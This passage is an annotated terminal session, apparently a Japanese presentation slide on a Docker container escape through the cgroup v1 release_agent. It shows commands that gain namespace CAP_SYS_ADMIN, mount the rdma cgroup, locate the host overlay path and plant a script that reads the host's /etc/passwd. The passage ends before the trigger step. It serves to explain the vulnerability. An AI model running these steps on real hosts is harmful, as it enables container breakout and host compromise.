root@ab988587a245:/# mount -t cgroup -o rdma cgroup /mnt ← 4. 通常のコンテナの capability セットには CAP_SYS_ADMIN が含まれず、mount(2) には CAP_SYS_ADMIN が必要なため cgroupfs をマウントできない
mount: /mnt: permission denied.
root@ab988587a245:/# unshare -rmC bash ← 5. user (-r: 新しい user namespace を作り、現在のユーザを namespace 内の root にマップ), mount (-m), cgroup (-C) の各 namespace を分離。注: Docker のデフォルト seccomp プロファイルでは CAP_SYS_ADMIN のないコンテナからの unshare(2) は拒否されるため、この手順は seccomp/AppArmor のデフォルトプロファイルが無効化された（または相当する緩和設定の）コンテナを前提にしていると思われる
root@ab988587a245:/# cat /proc/self/status | grep CapEff ← unshare 後の bash の effective capability セットを確認
CapEff: 000001ffffffffff
root@ab988587a245:/# capsh --decode=000001ffffffffff
0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_i
mmutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_s
ys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mkno
d,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap
_audit_read,38,39,40 ← 6. CAP_SYS_ADMIN を持つ。ただしこれは新しく作った user namespace 内でのみ有効な capability であり、ホスト（initial user namespace）に対する権限ではない。末尾の 38,39,40 はコンテナ内の capsh が名前を知らない新しめの capability で、それぞれ cap_perfmon, cap_bpf, cap_checkpoint_restore
root@ab988587a245:/# mount -t cgroup -o rdma cgroup /mnt ← 7. rdma サブシステムをマウント。user namespace 内の CAP_SYS_ADMIN で cgroup v1 のマウントが許可される。rdma を選ぶのは、コンテナランタイムが通常このコントローラを使っておらず、release_agent を自由に書ける未使用の階層を得やすいため（既にマウント済みのコントローラでは既存の階層が返る）
root@ab988587a245:/# ls /mnt
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@ab988587a245:/# mount | grep 'cgroup (rw'
cgroup on /mnt type cgroup (rw,relatime,rdma) ← rw でマウントされており、階層のルートにある release_agent に書き込める
root@ab988587a245:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` ← overlay マウントの upperdir= オプションの値を抽出。パターン中の \p は GNU sed では単なる p として扱われ "upperdir=" の末尾に一致するが、新しい GNU sed では stray backslash の警告が出ることがあるので、意図どおり s/.*upperdir=\([^,]*\).*/\1/p と書く方が明確
root@ab988587a245:/# echo $host_path
/var/lib/docker/overlay2/20c4102a1a817b0e564734054b876c051732c62f4993ce682508ac7cd7fcb1c6/diff ← 8. コンテナのルート FS に対応するホスト側パス (overlay の upperdir)。release_agent はカーネルがホスト側（initial mount namespace）で実行するため、コンテナ内の /cmd ではなくホストから見えるこのパスを指定する必要がある。storage driver が overlay2 でない場合や /etc/mtab に upperdir が現れない場合、この取得方法は使えない
root@ab988587a245:/# echo "$host_path/cmd" > /mnt/release_agent ← ホストから見た cmd のパスを release_agent に書き込む。ここが本質的な脆弱点で、修正済みカーネルでは release_agent への書き込みに initial user namespace の CAP_SYS_ADMIN が要求されるため permission denied になる
root@ab988587a245:/# echo '#!/bin/sh' > /cmd ← コンテナ内の /cmd はホスト側では $host_path/cmd として見える
root@ab988587a245:/# echo "cat /etc/passwd > $host_path/output" >> /cmd ← release_agent はホストの root 権限で実行されるので、ホストの /etc/passwd をコンテナの upperdir に書き出し、コンテナ内では /output として読める。$host_path は echo 時に展開されるため /cmd にはホスト側の絶対パスが埋め込まれる。実行には chmod +x が必要（トリガー手順とあわせて次のスライドで行われると思われる）
エクスプロイト (3/4)